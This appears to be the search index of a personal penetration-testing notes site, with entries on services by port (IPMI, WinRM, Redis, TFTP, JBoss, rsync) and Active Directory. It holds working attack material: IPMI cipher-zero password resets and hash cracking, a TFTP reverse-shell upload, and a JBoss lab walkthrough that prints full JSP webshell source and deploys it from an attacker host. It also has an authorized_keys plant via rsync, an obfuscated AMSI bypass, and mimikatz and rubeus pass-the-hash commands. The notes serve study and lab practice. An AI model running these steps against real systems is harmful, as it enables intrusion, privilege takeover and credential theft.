    ","tags":["dovecot","port 55007","port 55008"]},{"location":"55007-55008-dovecot/#basic-commands","title":"Basic commands","text":"
# Enter the username to login\nUSER username\n\n# Enter password\nPASS secretword\n\n# Now, you are logged in and you can list messages on the server for that user\nLIST\n\n# And you can read them using their id (id is a number)\nRETR id\n\n# You might be able to delete them\nDELE id\n
    ","tags":["dovecot","port 55007","port 55008"]},{"location":"5985-5986-winrm-windows-remote-management/","title":"Port 5985, 5986 - WinRM - Windows Remote Management","text":"

    How is WinRM different from Remote Desktop (RDP)? WinRM is a protocol for remote management, while Remote Desktop (RDP) is a protocol for remote desktop access. WinRM allows for remote execution of management commands, while RDP provides a graphical interface for remote desktop access.

    WinRM is part of the operating system. However, to obtain data from remote computers, you must configure a WinRM listener.

WinRM is a network protocol based on XML web services that uses the Simple Object Access Protocol (SOAP) to establish connections to remote hosts and their applications for management purposes. It takes care of the communication between Web-Based Enterprise Management (WBEM) and the Windows Management Instrumentation (WMI), which can call the Distributed Component Object Model (DCOM). For security reasons, WinRM must be activated and configured manually in Windows 10. WinRM uses the TCP ports 5985 (HTTP) and 5986 (HTTPS).

    Another component that fits WinRM for administration is Windows Remote Shell (WinRS), which lets us execute arbitrary commands on the remote system. The program is even included on Windows 7 by default.

    ","tags":["tools","port 5985","port 5986","winrm"]},{"location":"5985-5986-winrm-windows-remote-management/#footprinting-winrm","title":"Footprinting winrm","text":"

    As we already know, WinRM uses TCP ports 5985 (HTTP) and 5986 (HTTPS) by default, which we can scan using Nmap:

    nmap -sV -sC $ip -p5985,5986 --disable-arp-ping -n\n

    We'll connect to the WinRM service on the target and try to get a session. Because PowerShell isn't installed on Linux by default, we'll use a tool called Evil-WinRM which is made for this kind of scenario.

    evil-winrm -i $ip -u <username> -p <password>\n

For Windows, we can use the Test-WsMan cmdlet.
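
A quick sketch from a Windows host; Test-WSMan returns the WS-Management identity information if a listener responds:

Test-WSMan -ComputerName $ip\n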

    ","tags":["tools","port 5985","port 5986","winrm"]},{"location":"623-intelligent-platform-management-interface-ipmi/","title":"623 - Intelligent Platform Management Interface (IPMI)","text":"

    Intelligent Platform Management Interface (IPMI) is a system management tool that provides sysadmins with the ability to manage and monitor systems even if they are powered off or in an unresponsive state. It operates using a direct network connection to the system's hardware and does not require access to the operating system via a login shell. IPMI can also be used for remote upgrades to systems without requiring physical access to the target host. IPMI communicates over port 623 UDP. IPMI is typically used in three ways:

    • Before the OS has booted to modify BIOS settings
    • When the host is fully powered down
    • Access to a host after a system failure
    ","tags":["intelligent platform management interface","port 623","ipmi","bcm"]},{"location":"623-intelligent-platform-management-interface-ipmi/#footprinting-ipmi","title":"Footprinting ipmi","text":"

    Many Baseboard Management Controllers (BMCs) (including HP iLO, Dell DRAC, and Supermicro IPMI) expose a web-based management console, some sort of command-line remote access protocol such as Telnet or SSH, and the port 623 UDP, which, again, is for the IPMI network protocol.

    ","tags":["intelligent platform management interface","port 623","ipmi","bcm"]},{"location":"623-intelligent-platform-management-interface-ipmi/#discovery","title":"Discovery","text":"
nmap -n -p 623 10.0.0.0/24\nnmap -n -sU -p 623 10.0.0.0/24\nuse auxiliary/scanner/ipmi/ipmi_version\n
    ","tags":["intelligent platform management interface","port 623","ipmi","bcm"]},{"location":"623-intelligent-platform-management-interface-ipmi/#version","title":"Version","text":"
     sudo nmap -sU --script ipmi-version -p 623 <hostname/IP>\n

    Metasploit scanner module IPMI Information Discovery (auxiliary/scanner/ipmi/ipmi_version): this module discovers host information through IPMI Channel Auth probes:

use auxiliary/scanner/ipmi/ipmi_version\n\nshow actions\nset ACTION <action-name>\nshow options\n# and set needed options\nrun\n

    We might find BMCs where the administrators have not changed the default password:

Product | Username | Password
--- | --- | ---
Dell Remote Access Card (iDRAC, DRAC) | root | calvin
HP Integrated Lights Out (iLO) | Administrator | randomized 8-character string consisting of numbers and uppercase letters
Supermicro IPMI (2.0) | ADMIN | ADMIN
IBM Integrated Management Module (IMM) | USERID | PASSW0RD (with a zero)
Fujitsu Integrated Remote Management Controller | admin | admin
Oracle/Sun Integrated Lights Out Manager (ILOM) | root | changeme
ASUS iKVM BMC | admin | admin

    These default passwords may gain us access to the web console or even command line access via SSH or Telnet.
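
Trying those defaults against the exposed services is then straightforward (a sketch; usernames taken from the table above):

# Web console: browse to https://$ip and try the defaults\n# SSH / Telnet with default credentials, e.g. a Supermicro BMC\nssh ADMIN@$ip\ntelnet $ip 23\n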

    ","tags":["intelligent platform management interface","port 623","ipmi","bcm"]},{"location":"623-intelligent-platform-management-interface-ipmi/#vulnerability-ipmi-authentication-bypass-via-cipher-0","title":"Vulnerability - IPMI Authentication Bypass via Cipher 0","text":"

    Dan Farmer identified a serious failing of the IPMI 2.0 specification, namely that cipher type 0, an indicator that the client wants to use clear-text authentication, actually allows access with any password. Cipher 0 issues were identified in HP, Dell, and Supermicro BMCs, with the issue likely encompassing all IPMI 2.0 implementations.

    use auxiliary/scanner/ipmi/ipmi_cipher_zero\n

    Abuse this flaw with ipmitool:

    # Install\napt-get install ipmitool \n\n# Use Cipher 0 to dump a list of users. With -C 0 any password is accepted\nipmitool -I lanplus -C 0 -H $ip -U root -P root user list \n\n# Change the password of root\nipmitool -I lanplus -C 0 -H $ip -U root -P root user set password 2 abc123 \n
    ","tags":["intelligent platform management interface","port 623","ipmi","bcm"]},{"location":"623-intelligent-platform-management-interface-ipmi/#ipmi-20-rakp-remote-sha1-password-hash-retrieval","title":"IPMI 2.0 RAKP Remote SHA1 Password Hash Retrieval","text":"

    If default credentials do not work to access a BMC, we can turn to a flaw in the RAKP protocol in IPMI 2.0. During the authentication process, the server sends a salted SHA1 or MD5 hash of the user's password to the client before authentication takes place.

    Metasploit module:

This module identifies IPMI 2.0-compatible systems and attempts to retrieve the HMAC-SHA1 password hashes of default usernames. The hashes can be stored in a file using the OUTPUT_FILE option and then cracked using hmac_sha1_crack.rb in the tools subdirectory, as well as with hashcat (CPU) 0.46 or newer using hash type 7300.

use auxiliary/scanner/ipmi/ipmi_dumphashes\n\nshow actions\nset ACTION <action-name>\nshow options\n# set <options>\nrun\n

    Hashcat:

# -m 7300: IPMI2 RAKP HMAC-SHA1 mode; -a 3: mask attack with custom charset -1 = ?d?u (digits and uppercase letters)\nhashcat -m 7300 ipmi.txt -a 3 ?1?1?1?1?1?1?1?1 -1 ?d?u\n
    ","tags":["intelligent platform management interface","port 623","ipmi","bcm"]},{"location":"623-intelligent-platform-management-interface-ipmi/#how-does-ipmi-work","title":"How does IPMI work","text":"

    IPMI can monitor a range of different things such as system temperature, voltage, fan status, and power supplies. It can also be used for querying inventory information, reviewing hardware logs, and alerting using SNMP. The host system can be powered off, but the IPMI module requires a power source and a LAN connection to work correctly.

    Systems using IPMI version 2.0 can be administered via serial over LAN, giving sysadmins the ability to view serial console output in band. To function, IPMI requires the following components:

    • Baseboard Management Controller (BMC) - A micro-controller and essential component of an IPMI
    • Intelligent Chassis Management Bus (ICMB) - An interface that permits communication from one chassis to another
    • Intelligent Platform Management Bus (IPMB) - extends the BMC
    • IPMI Memory - stores things such as the system event log, repository store data, and more
    • Communications Interfaces - local system interfaces, serial and LAN interfaces, ICMB and PCI Management Bus.

    Baseboard Management Controllers (BMCs): Systems that use the IPMI protocol.

    BMCs are built into many motherboards but can also be added to a system as a PCI card. Most servers either come with a BMC or support adding a BMC. The most common BMCs we often see during internal penetration tests are HP iLO, Dell DRAC, and Supermicro IPMI.

    If we can access a BMC during an assessment, we would gain full access to the host motherboard and be able to monitor, reboot, power off, or even reinstall the host operating system. Gaining access to a BMC is nearly equivalent to physical access to a system.

    ","tags":["intelligent platform management interface","port 623","ipmi","bcm"]},{"location":"623-intelligent-platform-management-interface-ipmi/#resources","title":"Resources","text":"
    • hacktricks: https://book.hacktricks.xyz/network-services-pentesting/623-udp-ipmi
    ","tags":["intelligent platform management interface","port 623","ipmi","bcm"]},{"location":"6379-redis/","title":"6379 redis","text":"","tags":["redis","port 6379"]},{"location":"6379-redis/#description","title":"Description","text":"

Redis (REmote DIctionary Server) is an open-source, in-memory, advanced NoSQL key-value data store used as a database, cache, and message broker. Redis popularized the idea of a system that can be considered a store and a cache at the same time. The Redis command line interface (redis-cli) is a terminal program used to send commands to and read replies from the Redis server. Whether you\u2019ve installed Redis locally or you\u2019re working with a remote instance, you need to connect to it in order to perform most operations.

    ","tags":["redis","port 6379"]},{"location":"6379-redis/#the-server","title":"The server","text":"

    Redis runs as server-side software so its core functionality is in its server component. The server listens for connections from clients, programmatically or through the command-line interface.

    ","tags":["redis","port 6379"]},{"location":"6379-redis/#the-cli","title":"The CLI","text":"

The command-line interface (CLI) is a powerful tool that gives you complete access to Redis\u2019s data and functionality, whether you are exploring it interactively or developing software or a tool that needs to interact with it.

    ","tags":["redis","port 6379"]},{"location":"6379-redis/#database","title":"Database","text":"

    The database is stored in the server's RAM to enable fast data access. Redis also writes the contents of the database to disk at varying intervals to persist it as a backup, in case of failure.

    ","tags":["redis","port 6379"]},{"location":"6379-redis/#install-redis-in-your-kali","title":"Install redis in your kali","text":"","tags":["redis","port 6379"]},{"location":"6379-redis/#prerequisites","title":"Prerequisites","text":"

    If you're running a very minimal distribution (such as a Docker container) you may need to install lsb-release first:

    sudo apt install lsb-release\n

    Add the repository to the apt index, update it, and then install:

    curl -fsSL https://packages.redis.io/gpg | sudo gpg --dearmor -o /usr/share/keyrings/redis-archive-keyring.gpg\n\necho \"deb [signed-by=/usr/share/keyrings/redis-archive-keyring.gpg] https://packages.redis.io/deb $(lsb_release -cs) main\" | sudo tee /etc/apt/sources.list.d/redis.list\n\nsudo apt-get update\n\nsudo apt-get install redis\n
    ","tags":["redis","port 6379"]},{"location":"6379-redis/#to-connect-to-a-terminal","title":"To connect to a terminal","text":"

    First thing to know is that you can use \u201ctelnet\u201d (usually on Redis default port 6379)

    telnet localhost 6379\n

    If you have redis-server installed locally, you can connect to the Redis instance with the redis-cli command.

    If you want to connect to a remote Redis datastore, you can specify its host and port numbers with the -h and -p flags, respectively. Also, if you\u2019ve configured your Redis database to require a password, you can include the -a flag followed by your password in order to authenticate:

    redis-cli -h host -p port_number -a password\n

    If you\u2019ve set a Redis password, clients will be able to connect to Redis even if they don\u2019t include the -a flag in their redis-cli command. However, they won\u2019t be able to add, change, or query data until they authenticate. To authenticate after connecting, use the auth command followed by the password:

    auth password\n

    If the password passed to auth is valid, the command will return OK. Otherwise, it will return an error.

    redis-cli -h 10.129.124.88\n

    Upon a successful connection with the Redis server, we should be able to see a prompt in the terminal as:

    IP:6379>\n

    One of the basic Redis enumeration commands is info which returns information and statistics about the Redis server.
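
A one-shot sketch of that first enumeration step (assumes no password is set):

redis-cli -h $ip info\n# the Server and Keyspace sections are usually the most interesting\n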

    ","tags":["redis","port 6379"]},{"location":"6379-redis/#dumping-database","title":"Dumping Database","text":"

Inside Redis, databases are identified by numbers starting from 0. You can see which ones are in use in the output of the command info, inside the \"Keyspace\" section:

    # Keyspace\ndb0:keys=4, expires=0, avg_ttl=0\ndb1:keys=2, expires=0, avg_ttl=0\n

    Or you can just get all the keyspaces (databases) with:

    INFO keyspace\n

    Redis has a concept of separated namespaces called \u201cdatabases\u201d. You can select the database number you want to use with \u201cSELECT\u201d. By default the database with index 0 is used.

    # Select database\nredis 127.0.0.1:6379> SELECT 1\n\n# To see all keys in a given database. First, you enter in it with \"SELECT <number>\" and then\nredis 127.0.0.1:6379> keys *\n\n# To retrieve a specific key\nredis 127.0.0.1:6379> get flag\n
    ","tags":["redis","port 6379"]},{"location":"6653-openflow/","title":"6653 Openflow","text":"

    The OpenFlow protocol operates over TCP, with a default port number of 6653. This protocol operates between an SDN controller and an SDN-controlled switch or other device implementing the OpenFlow API.

    ","tags":["Openflow","port 6653"]},{"location":"69-tftp/","title":"69 - ftpt","text":"

    Trivial File Transfer Protocol (TFTP) uses UDP port 69 and requires no authentication\u2014clients read from, and write to servers using the datagram format outlined in RFC 1350. Due to deficiencies within the protocol (namely lack of authentication and no transport security), it is uncommon to find servers on the public Internet. Within large internal networks, however, TFTP is used to serve configuration files and ROM images to VoIP handsets and other devices.

    You can spot the open port after running a UDP scan. But also, when reading /etc/passwd, you might find service/user tftp.

    Trivial File Transfer Protocol (TFTP) is a simple protocol that provides basic file transfer function with no user authentication. TFTP is intended for applications that do not need the sophisticated interactions that File Transfer Protocol (FTP) provides.

UDP provides a mechanism to detect corrupt data in packets, but it does not attempt to solve other problems, such as lost or out-of-order packets. It is implemented in the transport layer of the OSI model and is known as a fast but unreliable protocol, unlike TCP, which is reliable but slower than UDP. Just as TCP has well-known ports for protocols such as HTTP, FTP, and SSH, UDP has ports for the protocols that run over UDP.

    ","tags":["pentesting"]},{"location":"69-tftp/#enumeration","title":"Enumeration","text":"
    nmap -n -Pn -sU -p69 -sV --script tftp-enum $ip\n
    ","tags":["pentesting"]},{"location":"69-tftp/#exploitation","title":"Exploitation","text":"

    You can use Metasploit or Python to check if you can download/upload files:

    Module: auxiliary/admin/tftp/tftp_transfer_util

You can also exploit it manually. Install a tftp client:

    # Installing a tftp server\nsudo apt-get install tftpd-hpa\n\n# Installing a tftp client\nsudo apt install tftp\n

    For available commands:

    man tftp\n

Upload your pentestmonkey reverse shell with:

put pentestmonkey.php\n

Where does it get uploaded? It depends, but the default configuration file for tftpd-hpa is /etc/default/tftpd-hpa, and the upload directory is configured there under the parameter TFTP_DIRECTORY. With that information, you can access the directory and launch your reverse shell from there.
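
A minimal interactive session sketch (file names are illustrative):

tftp $ip\n# then, at the tftp> prompt:\n# put pentestmonkey.php\n# get router-config.bin\n# quit\n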

    ","tags":["pentesting"]},{"location":"69-tftp/#related-labs","title":"Related labs","text":"

    HackTheBox machine: included.

    ","tags":["pentesting"]},{"location":"7z/","title":"7z","text":""},{"location":"7z/#installation","title":"Installation","text":"
    sudo apt install p7zip-full\n
    "},{"location":"7z/#basic-usage","title":"Basic usage","text":"
    # Extract file\n7z x ~/archive.7z\n\n# a : Add files to archive\n# b : Benchmark\n# d : Delete files from archive\n# e : Extract files from archive (without using directory names)\n# h : Calculate hash values for files\n# i : Show information about supported formats\n# l : List contents of archive\n# rn : Rename files in archive\n# t : Test integrity of archive\n# u : Update files to archive\n# x : eXtract files with full paths\n
    "},{"location":"8080-jboss/","title":"8080 JBoss AS Instance 6.1.0","text":"

    Copied from INE lab: HTML Adapter to Root

    Step 1:\u00a0Open the lab link to access the Kali GUI instance.

    Step 2:\u00a0Check if the provided machine/domain is reachable.

    Command:

    ping -c3 demo.ine.local\n

    The provided machine is reachable.

    Step 3:\u00a0Check open ports on the provided machine.

    Command:

    nmap -sS -sV demo.ine.local\n

    Multiple ports are open on the target machine.

    Some notable services include Java RMI, Apache Tomcat, and the JBoss application server.

    What is Java RMI?

    The Java Remote Method Invocation (RMI) system allows an object running in one Java virtual machine to invoke methods on an object running in another Java virtual machine. RMI provides for remote communication between programs written in the Java programming language.

    Reference:\u00a0https://docs.oracle.com/javase/tutorial/rmi/index.html

    What is Apache Tomcat?

    Apache Tomcat is a free and open-source implementation of the Jakarta Servlet, Jakarta Expression Language, and WebSocket technologies. It provides a \"pure Java\" HTTP web server environment in which Java code can run.

    Reference:\u00a0https://en.wikipedia.org/wiki/Apache_Tomcat

    What is JBoss application server?

    JBoss application server is an open-source platform, developed by Red Hat, used for implementing Java applications and a wide variety of other software applications. You can build and deploy Java services to be scaled to fit the size of your business.

    Reference:\u00a0https://www.dnsstuff.com/what-is-jboss-application-server

    Step 4:\u00a0Check the application served by Apache Tomcat.

    Open the following URL in the browser:

    URL:\u00a0http://demo.ine.local:8080

    Notice that the target is serving the JBoss application server (version 6.1.0).

    Step 5:\u00a0Access the JMX console.

    Click on the\u00a0JMX Console\u00a0link:

    What is JMX?

    Java Management Extensions (JMX) is a Java technology that supplies tools for managing and monitoring applications, system objects, devices (such as printers) and service-oriented networks. Those resources are represented by objects called MBeans (for Managed Bean).

    Reference:\u00a0https://en.wikipedia.org/wiki/Java_Management_Extensions

    Using the JMX console, we can manage the application and, therefore, alter it to execute malicious code on the target server and gain remote code execution.

    What is an MBean?

    An MBean is a managed Java object, similar to a JavaBeans component, that follows the design patterns set forth in the JMX specification. An MBean can represent a device, an application, or any resource that needs to be managed.

    Reference:\u00a0https://docs.oracle.com/javase/tutorial/jmx/mbeans/index.html

    Once the JMX Console is clicked, you should be presented with an authentication dialog:

    Searching online for the default credentials for JBoss:

    Click on the\u00a0StackOverflow link\u00a0from the results:

    The default credentials for JBoss web console are:

    Username:\u00a0admin Password:\u00a0admin

    Submit these credentials to the authentication dialog:

    The above credentials were accepted, and the login was successful!

    You should have access to the\u00a0JMX Agent View\u00a0page now.

    Using this page, one can manage the deployed applications and even alter them.

    Step 6:\u00a0Search for the\u00a0MainDeployer\u00a0(JBoss System API).

    Apply the following filter:

    Filter:

    jboss.system*\n

    Select the entry for\u00a0MainDeployer.

    Information:\u00a0The MainDeployer service can be used to manage deployments on the JBoss application server. For that reason, this API is quite crucial from a pentester's perspective.

    Once the\u00a0MainDeployer\u00a0service is selected, you should see the following page:

    Scroll down to the\u00a0redeploy\u00a0attribute. Make sure the\u00a0redeploy\u00a0attribute accepts a URL as the input (java.net.URL):

    We will be invoking this method to deploy a malicious JSP application, one that gives us a webshell.

    Step 7:\u00a0Prepare the payload for deployment.

    Head over to the following URL:

    URL:\u00a0https://github.com/fuzzdb-project/fuzzdb/blob/master/web-backdoors/jsp/cmd.jsp

    Open the code in raw form (click the\u00a0Raw\u00a0button):

Copy the raw payload and save it as backdoor.jsp:

    <%@ page import=\"java.util.*,java.io.*\"%>\n<%\n//\n// JSP_KIT\n//\n// cmd.jsp = Command Execution (unix)\n//\n// by: Unknown\n// modified: 27/06/2003\n//\n%>\n<HTML><BODY>\n<FORM METHOD=\"GET\" NAME=\"myform\" ACTION=\"\">\n<INPUT TYPE=\"text\" NAME=\"cmd\">\n<INPUT TYPE=\"submit\" VALUE=\"Send\">\n</FORM>\n<pre>\n<%\nif (request.getParameter(\"cmd\") != null) {\n    out.println(\"Command: \" + request.getParameter(\"cmd\") + \"<BR>\");\n    Process p = Runtime.getRuntime().exec(request.getParameter(\"cmd\"));\n    OutputStream os = p.getOutputStream();\n    InputStream in = p.getInputStream();\n    DataInputStream dis = new DataInputStream(in);\n    String disr = dis.readLine();\n    while ( disr != null ) {\n        out.println(disr); \n        disr = dis.readLine(); \n        }\n    }\n%>\n</pre>\n</BODY></HTML>\n

    If the GET request contains the\u00a0cmd\u00a0parameter, the specified command is executed, and the results are displayed on the web page.

    Generate a WAR (Web Application Resource or Web application ARchive) file for deployment:

    Commands:

    jar -cvf backdoor.war backdoor.jsp\nfile backdoor.war\n

    The payload application is generated.

    Step 8:\u00a0Deploy the payload application on the target server.

    Check the IP address of the attacker machine:

    Command:

    ip addr\n

    The IP address of the attacker machine is\u00a0192.166.140.2.

    Note:\u00a0The IP addresses assigned to the labs are bound to change with every lab run. Kindly replace the IP addresses in the subsequent commands with the one assigned to your attacker machine. Failing to do that would result in failed exploitation attempts.

    Start a Python-based HTTP server to serve the payload application:

    Command:

    python3 -m http.server 80\n

    Head over to the JMX Console page and under the\u00a0redeploy\u00a0attribute, place the following URL as the parameter:

    URL:

    http://192.166.140.2/backdoor.war\n

    Note:\u00a0Kindly make sure to substitute the correct IP address in the above URL.

    Once the payload application URL is specified, click on the\u00a0Invoke\u00a0button:

    The operation was successful, as shown in the above image!

    Check the terminal where the Python-based HTTP server was running:

    Notice that there is a request from the target machine for the\u00a0backdoor.war\u00a0file.

    Step 9:\u00a0Access the webshell and run OS commands.

    Visit the following URL:

    URL:

    http://demo.ine.local:8080/backdoor/backdoor.jsp\n

    There is a simple webshell.

    Send the\u00a0id\u00a0command:

    We are running as\u00a0root!

    Send the\u00a0pwd\u00a0command:

    List the files in the current directory (ls -al):

    That was all for this lab on abusing a misconfigured JBoss application server to access the JMX console (default credentials) and leveraging it to deploy a webshell.

    To summarize, we performed recon on the target machine to determine the presence of JBoss AS. We found that the JMX console accepted default credentials and leveraged it to deploy a malicious application to execute arbitrary commands on the target server as root.

    ","tags":["jboss","port 8080"]},{"location":"873-rsync/","title":"873 rsync","text":"","tags":["rsync","port 873"]},{"location":"873-rsync/#description","title":"Description","text":"

    rsync is a utility for efficiently transferring and synchronizing files between a computer and an external hard drive and across networked computers. It can be used to copy files locally on a given machine and to/from remote hosts. It is highly versatile and well-known for its delta-transfer algorithm. This algorithm reduces the amount of data transmitted over the network when a version of the file already exists on the destination host. It does this by sending only the differences between the source files and the older version of the files that reside on the destination server. It is often used for backups and mirroring. It finds files that need to be transferred by looking at files that have changed in size or the last modified time. By default, it uses port 873 and can be configured to use SSH for secure file transfers by piggybacking on top of an established SSH server connection.
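
As an illustration of that delta-transfer behaviour, a typical invocation looks like this sketch (paths and host are made up):

# Mirror a local directory to a remote host over SSH, sending only changed pieces\nrsync -avz -e ssh /local/dir/ user@$ip:/remote/dir/\n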

    ","tags":["rsync","port 873"]},{"location":"873-rsync/#footprinting-rsync","title":"Footprinting rsync","text":"
    sudo nmap -sV -p 873 $ip\n

    We can next probe the service a bit to see what we can gain access to:

    nc -nv $ip 873\n

    If some share is returned, we could go further by enumerating the share:

rsync -av --list-only rsync://$ip/<nameOfShare>\n

    nmap script to enumerate shares:

    nmap -sV --script \"rsync-list-modules\" -p <PORT> $ip\n

    metasploit module to enumerate shares

    use auxiliary/scanner/rsync/modules_list\n

    If IPv6 is in use:

    # Example using IPv6 and a different port\nrsync -av --list-only rsync://[dead:beef::250:56ff:feb9:e90a]:8730\n
    ","tags":["rsync","port 873"]},{"location":"873-rsync/#connect-to-the-service","title":"Connect to the service","text":"
    rsync rsync://IP\n
    ","tags":["rsync","port 873"]},{"location":"873-rsync/#basic-rsync-commands","title":"Basic rsync commands","text":"

    General syntax:

    rsync [OPTION] ... [USER@]HOST::SRC [DEST]\n
# List content\nrsync IP::\n\n# List a directory recursively\nrsync -r IP::folder\n\n# Download a file from the server to your machine\nrsync IP::folder/sourcefile.txt destinationfile.txt\n\n# Download a folder\nrsync -r IP::folder destinationfolder\n
    ","tags":["rsync","port 873"]},{"location":"873-rsync/#brute-force","title":"Brute force","text":"

    Once you have the list of modules you have a few different options depending on the actions you want to take and whether or not authentication is required. If authentication is not required you can list a shared folder:

rsync -av --list-only rsync://$ip/<nameOfShared>\n

    And copy all files to your local machine via the following command:

rsync -av rsync://$ip:8730/<nameOfShared> ./rsync_shared\n

    This recursively transfers all files from the directory <nameOfShared> on the machine $ip into the ./rsync_shared directory on the local machine. The files are transferred in \"archive\" mode, which ensures that symbolic links, devices, attributes, permissions, ownerships, etc. are preserved in the transfer.

    If you have credentials you can list/download a shared name using (the password will be prompted):

rsync -av --list-only rsync://<username>@$ip/<nameOfShared>\n\nrsync -av rsync://<username>@$ip:8730/<nameOfShared> ./rsync_shared\n

    You could also upload some content using rsync (for example, in this case we can upload an authorized_keys file to obtain access to the box):

    rsync -av home_user/.ssh/ rsync://<username>@$ip/home_user/.ssh\n
    ","tags":["rsync","port 873"]},{"location":"acronyms/","title":"Acronyms","text":""},{"location":"acronyms/#a","title":"A","text":"Acronym Expression"},{"location":"acronyms/#b","title":"B","text":"Acronym Expression BFLA Broken Funtion Level Authorization BOLA Broken Access Level Authorization"},{"location":"acronyms/#c","title":"C","text":"Acronym Expression"},{"location":"acronyms/#d","title":"D","text":"Acronym Expression"},{"location":"acronyms/#e","title":"E","text":"Acronym Expression"},{"location":"acronyms/#f","title":"F","text":"Acronym Expression"},{"location":"acronyms/#g","title":"G","text":"Acronym Expression"},{"location":"acronyms/#h","title":"H","text":"Acronym Expression"},{"location":"acronyms/#i","title":"I","text":"Acronym Expression IGA Identity Governance and Administration ILM Identity Lifecycle Management"},{"location":"acronyms/#j","title":"J","text":"Acronym Expression"},{"location":"acronyms/#k","title":"K","text":"Acronym Expression"},{"location":"acronyms/#l","title":"L","text":"Acronym Expression"},{"location":"acronyms/#m","title":"M","text":"Acronym Expression"},{"location":"acronyms/#n","title":"N","text":"Acronym Expression"},{"location":"acronyms/#o","title":"O","text":"Acronym Expression OTP One Time Password"},{"location":"acronyms/#p","title":"P","text":"Acronym Expression"},{"location":"acronyms/#q","title":"Q","text":"Acronym Expression"},{"location":"acronyms/#r","title":"R","text":"Acronym Expression RBAC Role Based Access Control"},{"location":"acronyms/#s","title":"S","text":"Acronym Expression SOAP Simple Object Access Protocol SCIM System for Cross-domain Identity Management is a standard for automating the exchange of user identity information between service provider and identity providers. It helps with automating functions like provisioning or deprovisioning of users identities on applications integrated with the identity provider."},{"location":"acronyms/#t","title":"T","text":"Acronym Expression"},{"location":"acronyms/#u","title":"U","text":"Acronym Expression"},{"location":"acronyms/#v","title":"V","text":"Acronym Expression"},{"location":"acronyms/#w","title":"W","text":"Acronym Expression"},{"location":"acronyms/#x","title":"X","text":"Acronym Expression"},{"location":"acronyms/#y","title":"Y","text":"Acronym Expression"},{"location":"acronyms/#z","title":"Z","text":"Acronym Expression"},{"location":"active-directory-ldap/","title":"Active Directory - LDAP","text":"

    Active Directory (AD) is a directory service for Windows network environments.

    In the context of Active Directory, a forest is a collection of one or more domain trees that share a common schema and global catalog, while a domain is a logical unit within a forest that represents a security boundary for authentication and authorization purposes.

    And what about LDAP? See here.

    ","tags":["active directory","ldap","windows"]},{"location":"active-directory-ldap/#tools","title":"Tools","text":"","tags":["active directory","ldap","windows"]},{"location":"active-directory-ldap/#xfreerdp","title":"xfreerdp","text":"

    See cheat sheet.

    xfreerdp /v:$ip /u:htb-student /p:<password> /cert-ignore\n
    ","tags":["active directory","ldap","windows"]},{"location":"active-directory-ldap/#rsat-remote-server-administration-tools","title":"RSAT (Remote Server Administration Tools)","text":"

    RSAT (Remote Server Administration Tools) cheat sheet:

# Check if RSAT tools are installed\nGet-WindowsCapability -Name RSAT* -Online \\| Select-Object -Property Name, State\n\n# Install all RSAT tools\nGet-WindowsCapability -Name RSAT* -Online \\| Add-WindowsCapability -Online\n\n# Install a specific RSAT tool, for instance Rsat.ActiveDirectory.DS-LDS.Tools\nAdd-WindowsCapability -Name Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0 -Online\n

    Once installed, all of the tools will be available under: Control Panel> All Control Panel Items >Administrative Tools.

    ","tags":["active directory","ldap","windows"]},{"location":"active-directory-ldap/#bypassing","title":"Bypassing","text":"","tags":["active directory","ldap","windows"]},{"location":"active-directory-ldap/#bypass-execution-policy","title":"Bypass Execution Policy","text":"
    powershell -ep bypass\n
    ","tags":["active directory","ldap","windows"]},{"location":"active-directory-ldap/#bypass-amsi","title":"Bypass AMSI","text":"
    **S`eT-It`em ( 'V'+'aR' +\u00a0 'IA' + ('blE:1'+'q2')\u00a0 + ('uZ'+'x')\u00a0 ) ( [TYpE](\u00a0 \"{1}{0}\"-F'F','rE'\u00a0 ) )\u00a0 ;\u00a0 \u00a0 (\u00a0 \u00a0 Get-varI`A`BLE\u00a0 ( ('1Q'+'2U')\u00a0 +'zX'\u00a0 )\u00a0 -VaL\u00a0 ).\"A`ss`Embly\".\"GET`TY`Pe\"((\u00a0 \"{6}{3}{1}{4}{2}{0}{5}\" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')\u00a0 ) ).\"g`etf`iElD\"(\u00a0 ( \"{0}{2}{1}\" -f('a'+'msi'),'d',('I'+'nitF'+'aile')\u00a0 ),(\u00a0 \"{2}{4}{0}{1}{3}\" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'\u00a0 )).\"sE`T`VaLUE\"(\u00a0 ${n`ULl},${t`RuE} )**\n
    ","tags":["active directory","ldap","windows"]},{"location":"active-directory-ldap/#run-a-utility-as-another-user","title":"Run a utility as another user","text":"
    # Run a utility as another user\nrunas /netonly /user:htb.local\\jackie.may powershell\n\n# Run an utility as another user with rubeus. Passing clear text credentials\nrubeus.exe asktgt /user:jackie.may /domain:htb.local /dc:10.10.110.100 /rc4:ad11e823e1638def97afa7cb08156a94\n\n# Run an utility as another user with mimikatz.exe. Passing clear text credentials\nmimikatz.exe sekurlsa::pth /domain:htb.local /user:jackie.may /rc4:ad11e823e1638def97afa7cb08156a94\n
    ","tags":["active directory","ldap","windows"]},{"location":"active-directory-ldap/#enumeration","title":"Enumeration","text":"

    Basic reconnaissance:\u00a0Who I am, where I am and what permissions I have.

    whoami\nhostname\nnet localgroup administrators\n\n# View a user's current rights\nwhoami /priv\n

Tools for enumeration:

    • Enumeration with LDAP queries
    • PowerView.ps1 from PowerSploit project (powershell).
    • The ActiveDirectory PowerShell module (powershell).
    • BloodHound (C# and PowerShell Collectors).
    • SharpView (C#).

    A basic AD user account with no added privileges can be used to enumerate the majority of objects contained within AD, including but not limited to:

    ","tags":["active directory","ldap","windows"]},{"location":"active-directory-ldap/#1-domain-computers","title":"1. Domain Computers","text":"
    # Use ADSI to search for all computers\n([adsisearcher]\"(&(objectClass=Computer))\").FindAll()\n\n#Query for installed software\nget-ciminstance win32_product \\| fl\n
    ","tags":["active directory","ldap","windows"]},{"location":"active-directory-ldap/#2-domain-users","title":"2. Domain Users","text":"

    Two ways. First, if we compromise a domain-joined system (or a client has you perform an AD assessment from one of their workstations) we can leverage RSAT to enumerate AD (Active Directory Users and Computers and ADSI Edit modules). Second, we can enumerate the domain from a non-domain joined host (provided that it is in a subnet that communicates with a domain controller) by launching any RSAT snap-ins using \"runas\" from the command line.

    # Gets one or more Active Directory users.\nGet-ADUser\n\n# List disabled users\nGet-ADUser -LDAPFilter '(userAccountControl:1.2.840.113556.1.4.803:=2)' | select name\n\n# Count all users in an OU\n(Get-ADUser -SearchBase \"OU=Employees,DC=INLANEFREIGHT,DC=LOCAL\" -Filter *).count\n

